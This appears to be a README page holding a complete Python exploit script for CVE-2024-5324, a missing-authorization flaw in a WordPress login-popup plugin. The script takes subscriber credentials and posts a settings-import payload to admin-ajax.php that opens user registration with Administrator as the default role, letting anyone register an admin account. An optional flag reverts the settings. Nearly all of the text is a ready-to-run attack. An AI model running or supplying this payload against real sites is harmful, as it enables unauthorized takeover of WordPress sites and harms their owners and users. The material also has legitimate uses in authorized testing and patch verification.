README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os
## Exploit script by @RandomRobbieBF
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def check_plugin_version(url,username,password):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
plugin_url = ""+url+"/wp-content/plugins/easy-login-woocommerce/readme.txt"
response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
if response.status_code == 200:
content = response.text
version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
if version_line:
version = version_line.split(':')[1].strip()
if version == "2.7.1" or version == "2.7.2":
print("The plugin version is "+version+".")
return version
else:
print("The plugin version is "+version+"")
exit()
else:
print("Failed to find the version information in the readme.txt file.")
exit()
else:
print("Plugin not installed")
exit()
def fixvul(url,username,password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to login")
exit()
payloads = [{"action":"xoo_admin_settings_import","xoo_ff_nonce":"","import":"{\"users_can_register\":\"0\",\"default_role\":\"subscriber\"}","slug":"easy-login-woocommerce"}]
main_url = f"{url}/wp-admin/admin-ajax.php"
for payload in payloads:
ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
ajax_response.raise_for_status()
# Check if option set successfully
if ajax_response.status_code == 200:
print(f"Option set successfully: {main_url}")
else:
print(f"Failed to set option: {main_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent})
if "Registration confirmation will be emailed to you" in register_response.text:
print("Failed to Reset Permissions")
exit()
else:
print("Options reset to default")
except requests.exceptions.RequestException as e:
print(f"Request failed with an error: {e}")
def vulncheck(url, username, password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to log in.")
exit()
payloads = [{"action":"xoo_admin_settings_import","xoo_ff_nonce":"","import":"{\"users_can_register\":\"1\",\"default_role\":\"administrator\"}","slug":"easy-login-woocommerce"}]
main_url = f"{url}/wp-admin/admin-ajax.php"
for payload in payloads:
ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
ajax_response.raise_for_status()
# Check if option set successfully
if ajax_response.status_code == 200:
print(f"Option set successfully: {main_url}")
else:
print(f"Failed to set option: {main_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent})
if "Registration confirmation will be emailed to you" in register_response.text:
print("You can now register a user on as an admin dont forget to set a fix once you have made an admin account")
exit()
else:
print("boooo")
print("If the site is not in english you might have to manually check it has worked.")
except requests.exceptions.RequestException as e:
print(f"Request failed with an error: {e}")
# Add the vulnerability description as a comment
DESCRIPTION = """
CVE-2024-5324 Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - Missing Authorization to Arbitrary Options Update
Description:
The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_settings function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
parser.add_argument("-f","--fix", help="Undo Admin and Reg enablement")
args = parser.parse_args()
# Prompt for password if not provided as an argument
if not args.password:
args.password = getpass("Enter the WordPress password: ")
check_plugin_version(args.url, args.username,args.password)
if args.fix:
fixvul(args.url, args.username, args.password)
else:
vulncheck(args.url, args.username, args.password)